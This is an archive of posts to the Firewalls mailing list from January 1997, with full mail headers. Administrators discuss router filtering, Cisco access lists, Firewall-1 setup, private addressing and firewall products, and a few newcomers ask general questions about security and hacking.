("Sean Miller") @ smtp Date: 01/07/97 04:05:01 PM Subject: Help in any of the folowing if at all possible I need some help in getting through firewalls (and if anyone can on getting through shells with restriced acces or access denied) Please help. Mark From firewalls-owner Thu Jan 9 09:31:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA24070 for firewalls-outgoing; Thu, 9 Jan 1997 09:19:24 -0800 (PST) Received: from trem.cnt.org.br (desvio.cnt.org.br [200.19.123.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA24051 for ; Thu, 9 Jan 1997 09:18:58 -0800 (PST) Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA11566; Thu, 9 Jan 1997 15:14:21 -0300 From: ormonde@trem.cnt.org.br (Rodrigo Ormonde) Message-Id: <9701091814.AA11566@trem.cnt.org.br> Subject: Re: internal filtering router - filter config? To: firewalls@greatcircle.com Date: Thu, 9 Jan 1997 15:14:20 -0300 (GRNLNDST) In-Reply-To: from "Darren Cromer" at Jan 7, 97 06:41:49 am X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I too am setting up a screening firewall, but I want to allow pings to > traverse the external router. (any advice on how to filter all ICMP > except pings?) It depends on wich firewall you are using. Anyway, if you can filter ICMP packets by Type of Service, set up a filter that allows packets with Types of Service 0 and 8 (Echo request and Echo reply) to pass and blocks any other ICMP packets. Hope this helps. -- Rodrigo de La Rocque Ormonde e-mail: ormonde@cnt.org.br PGP Public key: finger ormonde@cnt.org.br From firewalls-owner Thu Jan 9 11:04:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA29742 for firewalls-outgoing; Thu, 9 Jan 1997 10:56:35 -0800 (PST) Received: from sirius.hkstar.com (sirius.hkstar.com [202.82.0.148]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA29734 for ; Thu, 9 Jan 1997 10:56:25 -0800 (PST) Received: from default (uranus122.hkstar.com [202.82.51.122]) by sirius.hkstar.com (8.7.5/8.6.6) with ESMTP id CAA03347 for ; Fri, 10 Jan 1997 02:56:06 +0800 (HKT) Message-Id: <199701091856.CAA03347@sirius.hkstar.com> From: "Cyber Net-ghost" To: Subject: Where can i download the rainbow books ?? Date: Fri, 10 Jan 1997 03:06:55 +0800 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Where can i download the rainbow books I want the full length version of these books.... If u have...Please attach it to me....Thanks!! I am a student who interested in hacking, but there are no people to teach me, and there are no "Hacker Group" in Hong Kong ......What should i do now ?? Are there any hacker in Hong Kong ??? From firewalls-owner Thu Jan 9 12:04:22 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02178 for firewalls-outgoing; Thu, 9 Jan 1997 11:58:47 -0800 (PST) Received: from umhsp02.umh.ac.be (umhsp02.umh.ac.be [193.190.192.27]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA02152 for ; Thu, 9 Jan 1997 11:58:33 -0800 (PST) Received: from dialup23.mons.eunet.be by umhsp02.umh.ac.be (AIX 4.1/UCB 5.64/4.03) id AA15140; Thu, 9 Jan 1997 20:56:01 +0100 Message-Id: <3.0.32.19961231000008.007c65a0@umhsp02.umh.ac.be> X-Sender: vdupont@umhsp02.umh.ac.be X-Mailer: Windows Eudora Pro Version 3.0 Demo (32) Date: Thu, 09 Jan 1997 20:57:23 +0100 To: firewalls@greatcircle.com From: Vincent Dupont Subject: What are the Best Firewall Products ? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can someone can help me about Firewalls products ? "Firewalls" are new for me and I'm new in GreatCircle Mailing List ... I heard about this products : Raptor, Cycon, V-ONE, Digital firewall, ... Can you tell me about these products ? I'm student in computer sciences ; and the purpose of my project, this year, is : "install a firewall" on the network university I've read some documents about "constructing your firewall with linux box" ... but I'm not an linux expert ... So, is someone can help me to start in the "security world" ... thanks . Vincent Dupont. From firewalls-owner Thu Jan 9 13:36:52 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA05752 for firewalls-outgoing; Thu, 9 Jan 1997 13:18:14 -0800 (PST) Received: from snmpmgr.state.tn.us (snmpmgr.state.tn.us [170.142.1.74]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id NAA05734 for ; Thu, 9 Jan 1997 13:17:55 -0800 (PST) Received: from langate.tnet.state.tn.us by snmpmgr.state.tn.us with SMTP id AA07305 (5.67b/IDA-1.5 for ); Thu, 9 Jan 1997 15:17:14 -0600 Received: from tn01-Message_Server by langate.tnet.state.tn.us with Novell_GroupWise; Thu, 09 Jan 1997 15:17:58 -0600 Message-Id: X-Mailer: Novell GroupWise 4.1 Date: Thu, 09 Jan 1997 15:15:49 -0600 From: "Samuel T. Baker" To: firewalls@GreatCircle.COM Cc: bill.stout@hidata.com Subject: Multi-FW Gateway management GUI -Reply Mime-Version: 1.0 Content-Type: text/plain Content-Disposition: inline Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I think you ought to include a high-level (I think like #1) GUI to monitor (either real-time or period display [<24 hrs] data) of utilization/activity/traffic with the ability to selectively drill-down into a specific server/proxy/port/.... for more detailed statistics. This is certainly related to 14; but not the same. Some of this data would come from low-level processes in the OS not necessarily the FWs; but is intimately related to FW management. HTH Samuel Baker . . . standard disclaimer . . . >>> "Stout, Bill" 15:56 7 Jan1997 >>> I'm collecting basic requirements for FW-farm management applications for an internal instructional document. What I've thought of so far is the following: 1. An initial GUI which allows an administrator to view multiple gateways, ports, alert status, and proxy states. [snip] 14. Load balancing? Comments? Which are overkill and which should I add? Bill Stout From firewalls-owner Thu Jan 9 14:29:33 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id OAA12588 for firewalls-outgoing; Thu, 9 Jan 1997 14:20:10 -0800 (PST) Received: from california.sandia.gov (california.sandia.gov [146.246.250.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id OAA12385 for ; Thu, 9 Jan 1997 14:19:27 -0800 (PST) Received: from stealth.ran.sandia.gov (stealth.ran.sandia.gov [134.252.16.29]) by california.sandia.gov (8.8.4/1.15) with ESMTP id OAA17021 for ; Thu, 9 Jan 1997 14:19:06 -0800 (PST) Received: from stealth.ran.sandia.gov (stealth.ran.sandia.gov [134.252.16.29]) by stealth.ran.sandia.gov (8.7.5/8.7.3) with SMTP id OAA00529 for ; Thu, 9 Jan 1997 14:10:28 -0800 (PST) Date: Thu, 9 Jan 1997 14:10:27 -0800 (PST) From: Phil Cox To: firewalls@greatcircle.com Subject: [INFO] Firewall monitoring tools != SNMP Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What tools (PD or Comercial) are availible for monitoring a firewall for performance/availiability from a remote station, while NOT using SNMP? -Phil * Philip C. Cox | Quote of the Day: * * pcox@sandia.gov | "Character : the decisions a person * * PAGER: (510) 355-5222 | makes when the choice is not * * VOICE: (510) 294-3149 | obvious." * From firewalls-owner Thu Jan 9 18:59:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04775 for firewalls-outgoing; Thu, 9 Jan 1997 17:30:29 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04710 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:07 -0800 (PST) Received: from mailhub1.experian.com ([192.45.129.9]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id QAA03173 for ; Wed, 8 Jan 1997 16:36:04 -0800 (PST) Received: (from uucp@localhost) by mailhub1.experian.com (8.8.4/8.8.4) id QAA19866 for ; Wed, 8 Jan 1997 16:34:55 -0800 (PST) Received: from mailsrv1.experian.com(192.45.133.1) by mailhub1.experian.com via smap (V1.3) id sma019862; Wed Jan 8 16:34:42 1997 Received: from gmills.ora.is.trw.com by mailsrv1.experian.com (SMI-8.6/SMI-SVR4) id QAA22613; Wed, 8 Jan 1997 16:35:56 -0800 Message-ID: <32D43CFC.7576@TRW.COM> Date: Wed, 08 Jan 1997 16:34:04 -0800 From: Gary Mills Reply-To: GARY.MILLS@TRW.COM Organization: Experian X-Mailer: Mozilla 3.0Gold (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.com Subject: RCP tcp/udp 111 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone comment on the security of rcp tcp/udp port 111. Regards, Gary, Gary Mills@experian.com From firewalls-owner Thu Jan 9 19:00:46 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06608 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:22 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06587 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:06:07 -0800 (PST) Received: from ultra1.dreamscape.com (ultra1.dreamscape.com [206.64.128.7]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA16724 for ; Thu, 9 Jan 1997 06:52:45 -0800 (PST) Received: from bertha (sb22.dreamscape.com [206.114.183.183]) by ultra1.dreamscape.com (8.8.4/8.8.4) with SMTP id JAA01827 for ; Thu, 9 Jan 1997 09:53:21 -0500 (EST) Message-ID: <32D5061F.2F66@dreamscape.com> Date: Thu, 09 Jan 1997 09:52:15 -0500 From: "Steven E. Matkoski" Reply-To: uscny8hb@ibmmail.com Organization: Blue Cross Blue Shield of CNY X-Mailer: Mozilla 3.0 (WinNT; I) MIME-Version: 1.0 To: Firewalls Mailing List Subject: registered IP addresses? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Does someone know what the registered IP addresses are that should be used for internal networks. These are the addresses that are not routed to the Internet. or even the RFC#? -- Thanks! -steve. matkoski@dreamscape.com From firewalls-owner Thu Jan 9 19:09:17 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06592 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:08 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06559 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:05:58 -0800 (PST) Received: from snet ([202.190.59.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id WAA23894 for ; Wed, 8 Jan 1997 22:30:49 -0800 (PST) Received: from sos.dataprep.com.my by snet (SMI-8.6/SMI-SVR4) id OAA05131; Thu, 9 Jan 1997 14:38:32 -0800 Received: by sos.dataprep.com.my with Microsoft Mail id <01BBFE3C.05A4CD40@sos.dataprep.com.my>; Thu, 9 Jan 1997 14:47:22 +-800 Message-ID: <01BBFE3C.05A4CD40@sos.dataprep.com.my> From: KENNETH PHANG To: "'Firewall digest'" Subject: Government and National Security Date: Thu, 9 Jan 1997 14:47:20 +-800 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all, Currently i am doing a research on the Electronic Government = Information System and National Security related to computer security = and access and wonder anybody can point out where can I get more = information on these issues. Any related URL would be grateful. I would = like to make an apology to everybody on the list if my question is a bit = off topic.=20 Thanks. Cheers Kent From firewalls-owner Thu Jan 9 19:14:44 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04663 for firewalls-outgoing; Thu, 9 Jan 1997 17:29:51 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04609 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:29:36 -0800 (PST) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA29144 for ; Wed, 8 Jan 1997 15:44:38 -0800 (PST) Received: from big-dogs.cisco.com ([171.68.53.75]) by diablo.cisco.com (8.8.4/CISCO.SERVER.1.2) with SMTP id PAA19106; Wed, 8 Jan 1997 15:44:18 -0800 (PST) Message-Id: <3.0.32.19970108184413.006bcaf4@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Wed, 08 Jan 1997 18:44:18 -0500 To: uscny8hb@ibmmail.com From: Paul Ferguson Subject: Re: internal filtering router - filter config? Cc: Firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:40 AM 1/8/97 -0500, Steven E. Matkoski wrote: > >Thanks, I also read that you could block source-routed packets there, >also. >If I am using a cisco router, how does on go about this? or can I get a >location for documentation. > Simply configure: no ip source-route as a global command, and Voila! - paul -- Paul Ferguson || || Consulting Engineering || || Herndon, Virginia USA |||| |||| tel: +1.703.397.5938 ..:||||||:..:||||||:.. e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Jan 9 19:29:34 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA10411 for firewalls-outgoing; Thu, 9 Jan 1997 19:22:24 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id TAA10398 for ; Thu, 9 Jan 1997 19:22:16 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-961106) id TAA01420; Thu, 9 Jan 1997 19:21:02 -0800 Received: from dockmaster.ncsc.mil(198.26.55.74) by mycroft via smap (V1.3mjr) id sma001418; Thu Jan 9 19:20:46 1997 Date: Thu, 9 Jan 97 19:06 EST From: Wilner@DOCKMASTER.NCSC.MIL Subject: Re: Is Wilner a NET.LOON To: firewalls@GreatCircle.COM Message-ID: <970110000657.041712@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Ad hominem attacks against members ... such as MJR ... That is simply rude and incorrect. I was not attacking MJR, but those who would quote pieces of his argument(s) out of context to support their own ill-conceived notions. That is all. From firewalls-owner Thu Jan 9 19:45:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04867 for firewalls-outgoing; Thu, 9 Jan 1997 17:31:00 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04765 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:26 -0800 (PST) Received: from gate.ups.com (gate.ups.com [198.80.14.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id SAA10204 for ; Wed, 8 Jan 1997 18:15:24 -0800 (PST) Received: by gate.ups.com id AA24661 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Wed, 8 Jan 1997 21:15:06 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-2); Wed, 8 Jan 1997 21:15:06 -0500 Received: by gate.ups.com (Protected-side Proxy Mail Agent-1); Wed, 8 Jan 1997 21:15:06 -0500 Date: Wed, 8 Jan 1997 21:15:02 -0500 (EST) From: Dave Wreski X-Sender: tel1dvw@butthead To: firewalls@greatcircle.com Subject: Blocking ports Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi all. I have a few questions regarding port access through a firewall. If I define source and destination IP addresses/ranges, is it necessary to define port ranges as well? I was thinking that IP spoofing might be an issue, but the best they could do would be to use a port that they are not supposed to. If I don't have any of the common services defined anyway, does it really make a difference? Does anyone know any specific references to incidents where someone accessed information they were not supposed to, under these circumstances? Thanks much, Dave Wreski ----------------------------------------------------------------------- "The opinions expressed here are my own and do not represent the views or opinions of United Parcel Service, Inc." ----------------------------------------------------------------------- echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sb20293A2058554E494Csnlbxq'|dc From firewalls-owner Thu Jan 9 19:57:49 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04749 for firewalls-outgoing; Thu, 9 Jan 1997 17:30:19 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04688 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:00 -0800 (PST) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id PAA00319 for ; Wed, 8 Jan 1997 15:58:43 -0800 (PST) Received: by smartwall.v-one.com; id SAA01119; Wed, 8 Jan 1997 18:58:24 -0500 (EST) Received: from nt_fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma001104; Wed, 8 Jan 97 18:58:01 -0500 Received: by nt_fs1.V-ONE.COM with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD96.1D4BCFD0@nt_fs1.V-ONE.COM>; Wed, 8 Jan 1997 18:59:46 -0500 Message-ID: From: "McMahan, Peg" To: "'Firewalls@GreatCircle.COM'" , "'Matthew Patton'" , =?iso-8859-1?Q?=22=27A=2E_=D6mer_K=F6ker=27=22?= Subject: RE: USAF: how it was hacked Date: Wed, 8 Jan 1997 18:59:45 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >---------- >From: A. =D6mer K=F6ker[SMTP:omer@superonline.net] >Sent: Wednesday, January 08, 1997 7:50 AM >To: 'Firewalls@GreatCircle.COM'; 'Matthew Patton' >Subject: RE: USAF: how it was hacked > >Interestingly enough this specific hole was described in detail on the >latest 2600mag. =20 >now you know they will start reading it... > Boy, if 2600 was talking about the phf bug in their latest issue it really says a lot as to how on top of things good old emmanuel is these days. phf was current last year. sheesh. From firewalls-owner Thu Jan 9 20:03:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06570 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:01 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06538 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:05:53 -0800 (PST) Received: from snet ([202.190.59.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id WAA23492 for ; Wed, 8 Jan 1997 22:19:22 -0800 (PST) Received: from palan-net.202.190.59.4 by snet (SMI-8.6/SMI-SVR4) id OAA05091; Thu, 9 Jan 1997 14:26:52 -0800 Date: Thu, 9 Jan 1997 14:26:52 -0800 Message-Id: <199701092226.OAA05091@snet> X-Sender: palan@202.190.59.4 X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com, sneakers@CS.YALE.EDU From: Kogulapalan Subject: VLAN OVER FW-1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk hi , i hav question on fw-1 by checkpoint : can checkpoint fw-1 have a full control over a certain VLANs ?? say for example, i'm putting a VLAN on my DMZ assume that I'm running firewall-1 on a SunSparc (see the below diagram) and attach it to ATM backbone using Centtilion 100 switches (Bay Networks) which provide the VLAN. let say i group all my sensitive servers under one VLAN and planning to put on DMZ so that, i can secure it from internal and external attacks......errr can it work ? 10mb +------+ 155mb INTERNET ---------| SUN |-----------INTERNAL NETWORK | FW-1 | +---+--+ | | | 10mb | | VLAN the machines that grouped in these particular VLAN is scattered around the building. i need some advice on how effective is this setup and does anyone implemented such a design ? please give me some input so that i can design a better network solution .. rgds, PaLaN From firewalls-owner Thu Jan 9 20:11:30 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04824 for firewalls-outgoing; Thu, 9 Jan 1997 17:30:50 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04753 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:21 -0800 (PST) Received: from mtymail.avantel-icom.com.mx ([200.33.228.147]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id RAA07660 for ; Wed, 8 Jan 1997 17:31:43 -0800 (PST) Received: by mtymail.avantel-icom.com.mx with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD9A.5A80C500@mtymail.avantel-icom.com.mx>; Wed, 8 Jan 1997 19:30:06 -0600 Message-ID: From: Ricardo Alvarado To: "Firewalls@GreatCircle.COM" Subject: RE: internal filtering router - filter config? Date: Wed, 8 Jan 1997 19:32:12 -0600 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Build an extended access list (ip access-group 1xx in) at the WAN port of your external router. You may refer to http://www.cisco.com or perform a search on "access-list" in your Cisco-CD documentation. If you use an extended access-list (Access group number above 100) you'll have more control over the packets that get across your network. With these, you can almost build a firewall right in your router, so you can get pretty good security with them. Regards… J Ricardo Alvarado B. DCN Network Provisioning v273.5767 DID 528.153.5767 SkyTel: 528.319.0779 PIN 525.4333 >---------- >From: Steven E. Matkoski[SMTP:matkoski@dreamscape.com] >Sent: Wednesday, January 08, 1997 7:40 AM >To: Firewalls@GreatCircle.COM >Subject: Re: internal filtering router - filter config? > >Firewalls-Digest wrote: >> >> In your external router you'd block any ICMP traffic going back and >> forth, as well as any packets bearing one of your internal IP addresses, >> as a source address, especially if these are going INTO your protected >> network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill >> any ports that your users will not be using, andl leave just mail, web, >> ftp, etc. >> >> ricardo >> ralvarado@avantel.com.mx >> >Thanks, I also read that you could block source-routed packets there, >also. >If I am using a cisco router, how does on go about this? or can I get a >location for documentation. > >Thanks! >-steve. >matkoski@dreamscape.com > From firewalls-owner Thu Jan 9 20:14:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id TAA09603 for firewalls-outgoing; Thu, 9 Jan 1997 19:03:51 -0800 (PST) Received: from panix3.panix.com (panix3.panix.com [198.7.0.4]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id TAA09594 for ; Thu, 9 Jan 1997 19:03:38 -0800 (PST) Received: from localhost (fangyou2@localhost) by panix3.panix.com (8.8.4/8.7/PanixU1.3) with SMTP id WAA00782 for ; Thu, 9 Jan 1997 22:04:40 -0500 (EST) Date: Thu, 9 Jan 1997 22:04:39 -0500 (EST) From: FaNgYoU2 To: firewalls@GreatCircle.com Subject: Notes through Firewall 1, the Dawg Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Uno. I need to set up a dumb Firewall-1 machine to permit Lotus Notes to run on an Intranet. The Notes Admin is sure that Notes can run on just a single port. What my equipment showed when I looked at Notes previously was that it made a connection on one port, a response came back on a different but very close port, some sort of handshake took place and the real data transfer started up on a third port. Is it true that Notes can be made to run on a single port through a firewall? I say dumb Firewall-1 because if you connect to it with a GUI interface it doesn't like, it is likely to crash and come back up with all security turned off. Apparently this is a fairly well known problem. Doso. There is a bunch of spammers at Sick@Puppy.xxx.sex They have absolutely nothing to do with Sick Puppy the Cat_Eating_Dawg. Nor do they have anything to do with the Church of the Dead Meow which continued after the arrest and incarceration of Sick Puppy in Tokyo. It's kind of amusing to watch young Hack Dawgy Dawg trying to get his Dad out of Japanese jail. Anyway, the spammers are posting in various forums. Don't let them mislead you. FaNgYoU2, Cyberspace^^Vampyre ^^ Touch it, touch it, touch me ... creatures of the Night ^^ From firewalls-owner Thu Jan 9 20:26:24 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04870 for firewalls-outgoing; Thu, 9 Jan 1997 17:31:05 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04778 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:33 -0800 (PST) Received: from smtp2.interramp.com (smtp2.interramp.com [38.8.200.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id SAA10928 for ; Wed, 8 Jan 1997 18:38:10 -0800 (PST) Received: from davidh.interramp.com by smtp2.interramp.com (8.8.1/SMI-4.1.3-PSI-irsmtp) id VAA08432; Wed, 8 Jan 1997 21:28:20 -0500 (EST) Message-ID: <32D44752.C73@checkpoint.com> Date: Wed, 08 Jan 1997 19:18:10 -0600 From: David Helms Reply-To: david.helms@checkpoint.com Organization: CheckPoint Software Technologies X-Mailer: Mozilla 3.0 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: Web Site Hacking References: <199701072013.PAA27798@SPARKY.CF.CS.YALE.EDU> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Fellow listers, Just an editorial comment, please no superflames.... Are folks aware that FireWall-1 can be installed and configured on a machine with a single interface just as well as on a machine with multiple interfaces? This provides all the filtering, authetication, encryption and content monitoring features of any other FireWall-1 system, but oriented towards traffic in and out of that server. End of my commercial, but it provides some interesting options if you have a client that needs something like a "ServerWall" (for lack of a better term.) Cheers, David Helms Check Point long-morrow@CS.YALE.EDU wrote: > > >Today's Washington Post had a brief article regarding the ForceField product > >from TIS which is apparently intended to address this issue. Unfortunately > >you have to register to find out anything specific about the package, e.g. > >which OS it replaces/augments. They do tell you the price however :-). I've > >registered but the implication is that the more specific information will > >be sent surface mail. > > According to the TIS Web page on Gauntlet ForceField > ( http://www.tis.com/docs/products/gauntlet/forcefield/index.html ) > if you register they will give you a free evaluation copy of the > software available in January. > > - Morrow -- __________________________________ David Helms Senior Technical Consultant CheckPoint Software Technologies ph 703.684.4824 fx 703.684.4847 davidh@checkpoint.com __________________________________ From firewalls-owner Thu Jan 9 20:38:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id RAA04890 for firewalls-outgoing; Thu, 9 Jan 1997 17:31:27 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id RAA04859 for firewalls@greatcircle.com; Thu, 9 Jan 1997 17:30:56 -0800 (PST) Received: from mx3.io.com ([204.157.155.6]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id VAA20795 for ; Wed, 8 Jan 1997 21:22:31 -0800 (PST) Received: from freke.ssds.com (freke.mcmurdo.gov [157.132.106.108]) by mx3.io.com (8.7.5/8.7.3) with SMTP id XAA14826; Wed, 8 Jan 1997 23:33:00 -0600 Message-Id: <3.0.32.19970109181317.0124b338@pop.io.com> X-Sender: cds@pop.io.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 09 Jan 1997 18:21:49 +1300 To: Henry Lim Chee Wee , "Starkweather, Mike" From: Chris Liljenstolpe Subject: Re: Pointcast Cc: firewalls@GreatCircle.COM Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:46 97-01-08 +0800, the sage Henry Lim Chee Wee scribed: >Starkweather, Mike wrote: >>=20 >> I am wondering how the members of this mail list have handled the >> flood of traffic generated by Pointcast. It has buried our firewall >> (Tis Toolkit) with the huge number of requests it generates. Their >> I-Server seems to help some but not as much as I had hoped. >>=20 >> If this is the wrong place for this question please redirect me. >>=20 >> Mike Starkweather >> Anheuser-Busch > >This is not much of a firewall question, but... > >If you are using I-Server from PointCast, then you should >be able to put the server directly to the firewall, downloading >pointcast's information at regular intervals of the day. That >will only constitute one request on the firewall per download. >Subsequently, all of your users should download the information >from the I-Server and NOT directly from PointCast. However, >remember to ask your users to upgrade their pointcast client >to version 1.1. The last time I checked, I-server only ran on NT :( -=3DChris > >On the finer details, you can check it out at : > >http://www.pointcast.com/support/iserver/faqs/cliredir.html > > >--=20 > _ > 0 (_| > |(_~|^~~| "I-dare-you geysering forth with=20 > TT/_ T"T heartacious good will" > ^^^^^^^^^^^^^^nitro ^^^^^^^^^^^^^ > > =E6=E6=E6=E6=E6=E6=E6=E6 A Happy New Year To All !!! =E6=E6=E6=E6=E6=E6= =E6=E6 > > Thus end the quotation from the scroll From firewalls-owner Thu Jan 9 20:53:02 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA06597 for firewalls-outgoing; Thu, 9 Jan 1997 18:06:15 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id SAA06575 for firewalls@greatcircle.com; Thu, 9 Jan 1997 18:06:03 -0800 (PST) Received: from cidexchange.infosel.com.mx (cidexchange.infosel.com.mx [148.246.8.22]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id AAA03291 for ; Thu, 9 Jan 1997 00:39:09 -0800 (PST) Received: by cidexchange.infosel.com.mx with Microsoft Exchange (IMC 4.0.837.3) id 